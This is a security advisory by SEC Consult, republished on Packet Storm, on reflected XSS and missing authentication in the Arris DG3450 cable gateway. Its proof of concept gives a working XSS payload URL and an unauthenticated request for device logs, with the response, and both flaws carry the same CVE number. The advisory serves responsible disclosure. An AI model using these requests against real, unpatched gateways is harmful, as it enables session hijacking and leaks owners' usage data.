what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Arris DG3450 AR01.02.056.18_041520_711.NCS.10 XSS / Missing Authentication

Arris DG3450 AR01.02.056.18_041520_711.NCS.10 XSS / Missing Authentication
Posted Mar 7, 2023
Authored by Steffen Robertz | Site sec-consult.com

Arris DG3450 cable gateway version AR01.02.056.18_041520_711.NCS.10 suffers from cross site scripting and missing authentication vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2023-27571, CVE-2023-27572
SHA-256 | c86cd78224d0a1dc11fa8725e61327ea16bc608bd258e5251a6ecfda7f8bb033

Arris DG3450 AR01.02.056.18_041520_711.NCS.10 XSS / Missing Authentication

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20230306-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Arris DG3450 Cable Gateway
vulnerable version: AR01.02.056.18_041520_711.NCS.10
fixed version: -
CVE number: CVE-2023-27571, CVE-2023-27572
impact: medium
homepage: https://www.commscope.com
found: 2022-10-21
by: S. Robertz (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult, an Atos company
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
Arris has been aquired by CommScope in 2019.

"At CommScope we push the boundaries of communications technology to
create the world’s most advanced networks. We design, manufacture,
install and support the hardware infrastructure and software
intelligence that enable our digital society to interact and thrive.
Working with customers, we advance broadband, enterprise and wireless
networks to power progress and create lasting connections.

Across the globe, our people and solutions are redefining connectivity,
solving today’s challenges and driving the innovation that will meet
the needs of what’s next."

Source: https://www.commscope.com/about-us/


Business recommendation:
------------------------
The vendor did not reply to any of our communication attempts. The security
issues have not been fixed. Users of this product are urged to contact their
support representative and request the vulnerabilities to be fixed.

SEC Consult highly recommends to perform a thorough security review of the
product conducted by security professionals to identify and resolve potential
further security issues.


Vulnerability overview/description:
-----------------------------------
1) Reflected Cross-Site-Scripting Vulnerability (CVE-2023-27572)
An attacker can execute arbitrary JavaScript code in the context of the
victim's session, thus perform all actions, exfiltrate information, etc. In
order to exploit this vulnerability the attacker will have to trick the user
into visiting a manipulated URL.

2) Missing Authentication (CVE-2023-27572)
Logfiles can be downloaded without prior authentication, once the correct URL
is known. This allows an attacker to gain further information about the usage
of the device.


Proof of concept:
-----------------
1) Reflected Cross-Site-Scripting Vulnerability (CVE-2023-27572)
The following URL has to be visited by the victim in order to execute arbitrary
JavaScript code.

http://$IP/https_redirect.php?page=%22;alert(document.domain);var%20dummy=%22


2) Missing Authentication (CVE-2023-27572)
The following HTTP request will return the log file of the device without
checking for a valid session cookie.

-------------------
GET /troubleshooting_logs_download.php?log_type=system&time_frame=today HTTP/1.1
Host: $IP

HTTP/1.1 200 OK
X-Content-Type-Options: nosniff
Set-Cookie: PHPSESSID=38b5a65ba1a4477e29efd73ee1e01554; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
strict-transport-security: max-age=600; includeSubDomains
Server: ARRIS Server
X-Frame-Options: DENY
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'; worker-src blob:
Cache-control: private
Pragma: private
Expires: 0
Content-type: text/plain;charset=utf-8
Content-Disposition: attachment; filename="troubleshooting_logs_system_today.txt"
Content-Transfer-Encoding: binary
Accept-Ranges: bytes
Content-Length: 437
Date: Tue, 21 Jun 2022 20:51:07 GMT

GUI: User:admin login
06/15/2022 22:46:56 Notice

GUI: User:admin logout
06/15/2022 22:42:14 Notice

GUI: User:admin logout
06/15/2022 22:41:26 Notice

GUI: User:admin logout
06/15/2022 22:41:06 Notice

GUI: User:admin logout
06/15/2022 22:40:47 Notice

GUI: User:admin login
06/15/2022 22:33:22 Notice

GUI: User:admin logout
06/15/2022 22:31:51 Notice
-------------------


Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been tested on the following device / firmware:
* Arris DG3450 with software version AR01.02.056.18_041520_711.NCS.10


Vendor contact timeline:
------------------------
2022-11-22: Contacting vendor through TAC.helpdesk@commscope.com; no response.
2022-12-05: Asking for security contact through @Arris Twitter social media
No response. Received "You can no longer send messages to this person"
after initial message.
2022-12-05: Contacting vendor via privacycontact@commscope.com; no response.
2023-01-24: Contacting vendor again via privacycontact@commscope.com and
TAC.helpdesk@commscope.com; no response
2023-03-02: Requesting CVE numbers.
2023-03-06: Release of security advisory.


Solution:
---------
The vendor did not reply to any of our communication attempts. The security
issues have not been fixed. Users of this product are urged to contact their
support representative and request the vulnerabilities to be fixed.


Workaround:
-----------
None


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF S. Robertz / @2023

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close